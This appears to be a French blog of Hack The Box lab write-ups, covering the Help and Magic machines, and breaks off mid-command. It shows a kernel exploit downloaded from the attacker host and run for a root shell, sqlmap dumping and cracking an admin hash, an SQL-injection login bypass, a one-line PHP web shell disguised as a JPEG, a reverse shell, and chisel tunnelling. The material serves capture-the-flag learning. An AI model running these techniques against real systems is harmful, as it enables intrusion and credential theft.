trouve la version du Kernel qui semble un peu vieux (Feb 12 21:23:04 UTC 2018) alors que la machine date de Janvier 2019. On tente une recherche sur internet et sur searchsploit pour voir si ce kernel est vulnerable.\nIl semble que les Kernel linux en dessous de cette version sont vulnerable mais pas celle ci. C\u0026rsquo;est à dire : \u0026lt; 4.4.0-116-generic. D\u0026rsquo;après ce que j\u0026rsquo;ai appris, il est toujours important de vérifier quand même si une exploitation est possible pour une version, même si c\u0026rsquo;est indiqué \u0026ldquo;\u0026lt;\u0026rdquo;. Parfois, \u0026ldquo;\u0026lt;\u0026rdquo; est en realité \u0026ldquo;\u0026lt;=\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 Distributor ID:\tUbuntu Description:\tUbuntu 16.04.5 LTS Release:\t16.04 Codename:\txenial J\u0026rsquo;ai récupérer l\u0026rsquo;exploit trouvé sur searchsploit :\n1 2 3 4 5 searchsploit 4.4.0-116 - ------------------------------------------------------- Exploit Title - ------------------------------------------------------- Linux Kernel \u0026lt; 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation Il m\u0026rsquo;a suffit ensuite de la télécharger sur la machine, de le compiler avec gcc puis de l\u0026rsquo;executer afin d\u0026rsquo;obtenir un shell en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 help@help:~$ wget http://10.10.16.10:8000/44298.c --2025-08-27 05:09:41-- http://10.10.16.10:8000/44298.c Connecting to 10.10.16.10:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 5773 (5.6K) [text/x-csrc] Saving to: ‘44298.c’ 44298.c 100%[=====================================================================================================================\u0026gt;] 5.64K --.-KB/s in 0.01s 2025-08-27 05:09:42 (384 KB/s) - ‘44298.c’ saved [5773/5773] help@help:~$ gcc 44298.c -o exploit help@help:~$ chmod +x exploit help@help:~$ ./exploit task_struct = ffff880015b98e00 uidptr = ffff8800192f7c04 spawning root shell root@help:~# whoami root root@help:~# cat /root/root.txt 924b.....f182 Bonus CVE : SQL Injection (Authenticated) Dans un premier temps, on se connecte à HelpdeskZ à l\u0026rsquo;aide des credentials trouvés sur Graphql. Ensuite, on poste un ticket avec une piece-jointe (pas de fichier php, n\u0026rsquo;importe lequel suffit). Ensuite, on va dans nos tickets et on essaye de telecharger notre pièce-jointe. On intercepte la requête dans Burp, il suffit ensuite de l\u0026rsquo;enregistrer dans un fichier puis de le passer en paramètre de sqlmap :\n1 2 3 4 5 6 7 8 9 10 11 GET /support/?v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 HTTP/1.1 Host: help.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://help.htb/support/?v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8 Cookie: lang=english; PHPSESSID=dh62bg5tt2j2gk4bofntn637q5; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BEWTAAjyRu71c6GI%2BULmLmTqISzoi3A27eA1M9ErCXvXw%3D%3D Upgrade-Insecure-Requests: 1 Priority: u=0, i On enregistre cette requete dans un fichier ticket.req.\nOn execute sqlmap :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 ------------------------------------------------ $ sqlmap -r ticket.req --batch --dbs --thread 10 ___ __H__ ___ ___[\u0026#39;]_____ ___ ___ {1.9.3.3#dev} |_ -| . [.] | .\u0026#39;| . | |___|_ [\u0026#39;]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:37:53 /2025-08-27/ [14:37:53] [INFO] parsing HTTP request from \u0026#39;ticket.req\u0026#39; [14:37:53] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [14:37:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:37:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL \u0026gt;= 5.0.12 [14:37:53] [INFO] fetching database names [14:37:53] [INFO] fetching number of databases [14:37:53] [INFO] retrieved: 5 [14:37:54] [INFO] retrieving the length of query output [14:37:54] [INFO] retrieved: 18 [14:37:58] [INFO] retrieved: information_schema [14:37:58] [INFO] retrieving the length of query output [14:37:58] [INFO] retrieved: 5 [14:38:00] [INFO] retrieved: mysql [14:38:00] [INFO] retrieving the length of query output [14:38:00] [INFO] retrieved: 18 [14:38:03] [INFO] retrieved: performance_schema [14:38:03] [INFO] retrieving the length of query output [14:38:03] [INFO] retrieved: 7 [14:38:06] [INFO] retrieved: support [14:38:06] [INFO] retrieving the length of query output [14:38:06] [INFO] retrieved: 3 [14:38:07] [INFO] retrieved: sys available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] support [*] sys [14:38:07] [INFO] fetched data logged to text files under \u0026#39;/root/.local/share/sqlmap/output/help.htb\u0026#39; [*] ending @ 14:38:07 /2025-08-27/ -------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support --tables ___ __H__ ___ ___[\u0026#34;]_____ ___ ___ {1.9.3.3#dev} |_ -| . [.] | .\u0026#39;| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:38:50 /2025-08-27/ [14:38:50] [INFO] parsing HTTP request from \u0026#39;ticket.req\u0026#39; [14:38:50] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [14:38:50] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:38:51] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL \u0026gt;= 5.0.12 [14:38:51] [INFO] fetching tables for database: \u0026#39;support\u0026#39; [14:38:51] [INFO] fetching number of tables for database \u0026#39;support\u0026#39; [14:38:51] [INFO] retrieved: 19 ... ... [14:39:34] [INFO] retrieved: 5 [14:39:36] [INFO] retrieved: staff [14:39:36] [INFO] retrieving the length of query output [14:39:36] [INFO] retrieved: 7 [14:39:39] [INFO] retrieved: tickets [14:39:39] [INFO] retrieving the length of query output [14:39:39] [INFO] retrieved: 16 [14:39:42] [INFO] retrieved: tickets_messages [14:39:42] [INFO] retrieving the length of query output [14:39:42] [INFO] retrieved: 5 [14:39:44] [INFO] retrieved: users Database: support [19 tables] +------------------------+ | articles | | attachments | | canned_response | | custom_fields | | departments | | emails | | error_log | | file_types | | knowledgebase_category | | login_attempt | | login_log | | news | | pages | | priority | | settings | | staff | | tickets | | tickets_messages | | users | +------------------------+ [14:39:44] [INFO] fetched data logged to text files under \u0026#39;/root/.local/share/sqlmap/output/help.htb\u0026#39; [*] ending @ 14:39:44 /2025-08-27/ ---------------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support -T staff --columns ___ __H__ ___ ___[)]_____ ___ ___ {1.9.3.3#dev} |_ -| . [,] | .\u0026#39;| . | |___|_ [\u0026#39;]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:40:14 /2025-08-27/ [14:40:14] [INFO] parsing HTTP request from \u0026#39;ticket.req\u0026#39; [14:40:15] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [14:40:15] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:40:15] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL \u0026gt;= 5.0.12 [14:40:15] [INFO] fetching columns for table \u0026#39;staff\u0026#39; in database \u0026#39;support\u0026#39; [14:40:15] [INFO] retrieved: 14 [14:40:16] [INFO] retrieving the length of query output [14:40:16] [INFO] retrieved: 2 [14:40:17] [INFO] retrieved: id [14:40:17] [INFO] retrieving the length of query output [14:40:17] [INFO] retrieved: 7 ... ... [14:41:18] [INFO] retrieved: 5 [14:41:19] [INFO] retrieved: admin [14:41:19] [INFO] retrieving the length of query output [14:41:19] [INFO] retrieved: 6 [14:41:21] [INFO] retrieved: int(1) [14:41:21] [INFO] retrieving the length of query output [14:41:21] [INFO] retrieved: 6 [14:41:24] [INFO] retrieved: status [14:41:24] [INFO] retrieving the length of query output [14:41:24] [INFO] retrieved: 24 [14:41:28] [INFO] retrieved: enum(\u0026#39;Enable\u0026#39;,\u0026#39;Disable\u0026#39;) Database: support Table: staff [14 columns] +------------------------+--------------------------+ | Column | Type | +------------------------+--------------------------+ | admin | int(1) | | status | enum(\u0026#39;Enable\u0026#39;,\u0026#39;Disable\u0026#39;) | | avatar | varchar(200) | | department | text | | email | varchar(255) | | fullname | varchar(100) | | id | int(11) | | last_login | int(11) | | login | int(11) | | newticket_notification | smallint(1) | | password | varchar(255) | | signature | mediumtext | | timezone | varchar(255) | | username | varchar(255) | +------------------------+--------------------------+ [14:41:28] [INFO] fetched data logged to text files under \u0026#39;/root/.local/share/sqlmap/output/help.htb\u0026#39; [*] ending @ 14:41:28 /2025-08-27/ ---------------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support -T staff --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.9.3.3#dev} |_ -| . [\u0026#34;] | .\u0026#39;| . | |___|_ [\u0026#39;]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:41:39 /2025-08-27/ [14:41:39] [INFO] parsing HTTP request from \u0026#39;ticket.req\u0026#39; [14:41:39] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [14:41:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets\u0026amp;action=ticket\u0026amp;param[]=8\u0026amp;param[]=attachment\u0026amp;param[]=5\u0026amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:41:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL \u0026gt;= 5.0.12 [14:41:39] [INFO] fetching columns for table \u0026#39;staff\u0026#39; in database \u0026#39;support\u0026#39; [14:41:39] [INFO] resumed: 14 ... ... [14:41:53] [INFO] retrieved: support@mysite.com [14:41:53] [INFO] retrieving the length of query output [14:41:53] [INFO] retrieved: 13 [14:41:56] [INFO] retrieved: Administrator [14:41:56] [INFO] retrieving the length of query output [14:41:56] [INFO] retrieved: 1 [14:41:57] [INFO] retrieved: 1 [14:41:58] [INFO] retrieving the length of query output [14:41:58] [INFO] retrieved: 10 [14:42:01] [INFO] retrieved: 1543429746 [14:42:01] [INFO] retrieving the length of query output [14:42:01] [INFO] retrieved: 10 [14:42:03] [INFO] retrieved: 1547216217 [14:42:03] [INFO] retrieving the length of query output [14:42:03] [INFO] retrieved: 1 [14:42:04] [INFO] retrieved: 0 [14:42:04] [INFO] retrieving the length of query output [14:42:04] [INFO] retrieved: 40 [14:42:12] [INFO] retrieved: d318f44739dced66793b1a603028133a76ae680e [14:42:12] [INFO] retrieving the length of query output [14:42:12] [INFO] retrieved: 28 [14:42:17] [INFO] retrieved: Best regards, Administrator [14:42:17] [INFO] retrieving the length of query output [14:42:17] [INFO] retrieved: 0 multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N [14:42:18] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [14:42:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [14:42:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch \u0026#39;--no-cast\u0026#39; or switch \u0026#39;--hex\u0026#39; [14:42:21] [INFO] retrieving the length of query output [14:42:21] [INFO] retrieved: 5 [14:42:23] [INFO] retrieved: admin [14:42:23] [INFO] recognized possible password hashes in column \u0026#39;password\u0026#39; do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [14:42:23] [INFO] using hash method \u0026#39;sha1_generic_passwd\u0026#39; what dictionary do you want to use? [1] default dictionary file \u0026#39;/opt/tools/sqlmap/data/txt/wordlist.tx_\u0026#39; (press Enter) [2] custom dictionary file [3] file with list of dictionary files \u0026gt; 1 [14:42:23] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [14:42:23] [INFO] starting dictionary-based cracking (sha1_generic_passwd) [14:42:23] [INFO] starting 12 processes [14:42:24] [INFO] cracked password \u0026#39;Welcome1\u0026#39; for user \u0026#39;admin\u0026#39; Database: support Table: staff [1 entry] +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | id | email | login | avatar | admin | status | fullname | password | timezone | username | signature | department | last_login | newticket_notification | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | 1 | support@mysite.com | 1547216217 | NULL | 1 | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | \u0026lt;blank\u0026gt; | admin | Best regards,\\r\\nAdministrator | a:1:{i:0;s:1:\u0026#34;1\u0026#34;;} | 1543429746 | 0 | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ [14:42:30] [INFO] table \u0026#39;support.staff\u0026#39; dumped to CSV file \u0026#39;/root/.local/share/sqlmap/output/help.htb/dump/support/staff.csv\u0026#39; [14:42:30] [INFO] fetched data logged to text files under \u0026#39;/root/.local/share/sqlmap/output/help.htb\u0026#39; [*] ending @ 14:42:30 /2025-08-27/ Après l\u0026rsquo;utilisation de SQLMap, nous n\u0026rsquo;avons pas eu besoin de faire une attaque par dictionnaire sur le hachage. En effet, SQLmap s\u0026rsquo;en est chargé et a trouvé le mot de passe : \u0026ldquo;d318f44739dced66793b1a603028133a76ae680e\u0026rdquo; \u0026ndash;\u0026gt; Welcome1.\nIl ne reste plus qu\u0026rsquo;à se connecter en SSH avec l\u0026rsquo;utilisateur help et ce mot de passe.\nTips Quand on trouve une version d\u0026rsquo;un service exploitable, vraiment pousser au maximum. Tenter plusieurs fois l\u0026rsquo;exploitation et avec plusieurs code différents. Vérifier rapidement le Kernel, en commençant par la date de sa compilation. Faire une recherche de la version rapidement sur internet, ça coûte rien et ici c\u0026rsquo;était bien la solution. Linpeas ne surlignera pas la version du Kernel. ","date":"2025-08-27T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/help-htb/","title":"HTB | Help"},{"content":" Machine name OS IP Difficulty CodeTwo Linux 10.10.11.82 Easy Soon :)\n","date":"2025-08-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/codetwo-htb/","title":"HTB | CodeTwo"},{"content":" Machine name OS IP Difficulty Magic Linux 10.10.10.185 Medium Users 1 2 3 4 ## mysql theseus : `iamkingtheseus` admin : `Th3s3usW4sK1ng` Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.185 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06d489bf51f7fc0cf9085e9763648dca (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX | 256 11a69298ce3540c729094f6c2d74aa66 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ= | 256 7105991fa81b14d6038553f8788ecb88 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Magic Portfolio | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) Foothold Website : login page On trouve un site internet sur le port 80 avec une page de login. Le site nous indique la possibilité d\u0026rsquo;upload des images. Après avoir testé plusieurs combinaisons de credentials (ex: admin/admin, root/root\u0026hellip;), on trouve une injection SQL qui nous permet de nous connecter\n1 2 user: aaaa\u0026#39; or 1=1;-- password: aaaa\u0026#39; or 1=1;-- En utilisant cela comme user et password, on obtient un accès à la page upload.php.\nUpload image : Exploit Magic Byte On peut uploader des images avec du code php à l\u0026rsquo;intérieur. Pour que le code php soit executé et que le fichier soit uploadé, il a fallu :\nChanger le magic byte par celui d\u0026rsquo;une image XXX : Modifier l\u0026rsquo;extension en \u0026ldquo;.php.jpg\u0026rdquo; (ou \u0026ldquo;.php.png\u0026rdquo;) En une seule ligne de code, cela nous donne :\n1 echo -ne \u0026#39;\\xFF\\xD8\\xFF\\xE0\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; shell_magic.php.jpg On peut alors executer du code php sur la machine en utilisant le paramètre cmd :\nhttp://10.10.10.185/images/uploads/shell_magic.php.jpg?cmd=id\nPourquoi cela fonctionne ?\nLe serveur vérifie l\u0026rsquo;extension du fichier. Ici, la dernière extension est bien \u0026ldquo;.jpg\u0026rdquo;, notre fichier passe le 1er test. Ensuite, le serveur vérifie le magic byte, il s\u0026rsquo;agit de plusieurs octets ecrit au début du fichier précisant le type : JPG, GIF, PHP. Il suffit donc de placer le magic byte d\u0026rsquo;une image PNG ou JPG pour passer cette deuxième couche de protection. Pourquoi le code php est executé ? Apache traite toutes les extensions dans un nom de fichier et s’arrête à la première extension qu’il reconnaît comme \u0026ldquo;exécutable\u0026rdquo; (comme .php), même si elle n’est pas la dernière. D\u0026rsquo;où l\u0026rsquo;importance d\u0026rsquo;écrire \u0026ldquo;.php.jpg\u0026rdquo;. Si on place seulement \u0026ldquo;.jpg\u0026rdquo;, le serveur apache interpretera le fichier comme une image et le code ne sera pas executé.\nEn utilisant le reverse shell php \u0026ldquo;pentest monkey\u0026rdquo;, on obtient facilement un shell sur la machine :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.185. Ncat: Connection from 10.10.10.185:51964. Linux magic 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 06:41:39 up 19:17, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (1197): Inappropriate ioctl for device bash: no job control in this shell www-data@magic:/$ export TERM=xterm export TERM=xterm www-data@magic:/$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@magic:/$ ^Z [1] + 9828 suspended nc -lnvp 9001 $ stty raw -echo;fg [1] + 9828 continued nc -lnvp 9001 www-data@magic:/$ whoami www-data mysql creds : db.php5 On trouve un fichier de base de donnée avec db.php5\n1 2 3 4 5 6 7 8 9 www-data@magic:/var/www/Magic$ cat db.php5 \u0026lt;?php class Database { private static $dbName = \u0026#39;Magic\u0026#39; ; private static $dbHost = \u0026#39;localhost\u0026#39; ; private static $dbUsername = \u0026#39;theseus\u0026#39;; private static $dbUserPassword = \u0026#39;iamkingtheseus\u0026#39;; ... Mysql connection (chisel port forwarding) : admin creds On remarque que le port mysql est bien ouvert (3306), cependant, l\u0026rsquo;outil mysql n\u0026rsquo;est pas installé et on ne peut pas se connecter à la base de donnée :\n1 2 3 4 5 6 7 8 www-data@magic:/var/www/Magic$ ss -lntp State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* ... www-data@magic:/var/www/Magic$ mysql Command \u0026#39;mysql\u0026#39; not found, but can be installed with: ... Pour contourner cela, j\u0026rsquo;ai décidé d\u0026rsquo;utiliser chisel pour faire du port forwarding. Le but étant d\u0026rsquo;accéder au port 3306 du serveur depuis ma machine hôte. Pour faire cela, il suffit de telecharger le binaire chisel sur la page github. Voici les commandes à effectuer:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 www-data@magic:/var/www/Magic$ wget http://10.10.16.2/chisel --2025-07-24 07:00:58-- http://10.10.16.2/chisel Connecting to 10.10.16.2:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9371800 (8.9M) [application/octet-stream] Saving to: \u0026#39;chisel\u0026#39; chisel 100%[===================\u0026gt;] 8.94M 336KB/s in 26s 2025-07-24 07:01:25 (351 KB/s) - \u0026#39;chisel\u0026#39; saved [9371800/9371800] 3306data@magic:/var/www/Magic$ ./chisel client 10.10.16.2:1082 R:3306:localhost:3306 \u0026gt; /dev/null 2\u0026gt; /dev/null \u0026amp; [1] 5146 .... ----------------------- $ ./chisel server -p 1082 --reverse 2025/07/24 16:02:12 server: Reverse tunnelling enabled 2025/07/24 16:02:12 server: Fingerprint 4PDYwTjgAniyianMIlBvt3QRTZm4VpYL+kFf1nXfQPg= 2025/07/24 16:02:12 server: Listening on http://0.0.0.0:1082 2025/07/24 16:03:19 server: session#1: tun: proxy#R:3306=\u0026gt;localhost:3306: Listening Depuis ma machine hôte, j\u0026rsquo;utilise la commande mysql pour me connecter a mon port local 3306 qui est forward vers le port 3306 du serveur. On trouve alors une database \u0026ldquo;Magic\u0026rdquo; et une table \u0026ldquo;login\u0026rdquo; contenant les credentials suivants: admin : Th3s3usW4sK1ng\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 $ mysql -h 127.0.0.1 -P 3306 -u theseus -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \\g. Your MySQL connection id is 25 Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. MySQL [(none)]\u0026gt; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Magic | +--------------------+ 2 rows in set (0.145 sec) MySQL [(none)]\u0026gt; use Magic; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Magic]\u0026gt; show tables; +-----------------+ | Tables_in_Magic | +-----------------+ | login | +-----------------+ 1 row in set (0.136 sec) MySQL [Magic]\u0026gt; select * from login; +----+----------+----------------+ | id | username | password | +----+----------+----------------+ | 1 | admin | Th3s3usW4sK1ng | +----+----------+----------------+ 1 row in set (0.106 sec) theseus user : su On se connecte en tant que theseus avec le mot de passe trouvé précédemment. Cependant, ssh ne fonctionne qu\u0026rsquo;avec une paire de clé publique.\n1 2 3 4 www-data@magic:/var/www/Magic$ su theseus Password: \u0026lt;---- Th3s3usW4sK1ng theseus@magic:/var/www/Magic$ cat /home/theseus/user.txt 6553.....4c7a SSH : theseus Pour obtenir un shell plus stable, j\u0026rsquo;ai généré une paire de clé RSA et j\u0026rsquo;ai ajouté la clé publique dans le fichier authorized_keys. Ensuite il suffit de copier le clé privé et de la mettre sur ma machine hôte, puis d\u0026rsquo;effectuer une connexion ssh :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 theseus@magic:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/theseus/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/theseus/.ssh/id_rsa. Your public key has been saved in /home/theseus/.ssh/id_rsa.pub. ... theseus@magic:~$ cd .ssh theseus@magic:~/.ssh$ 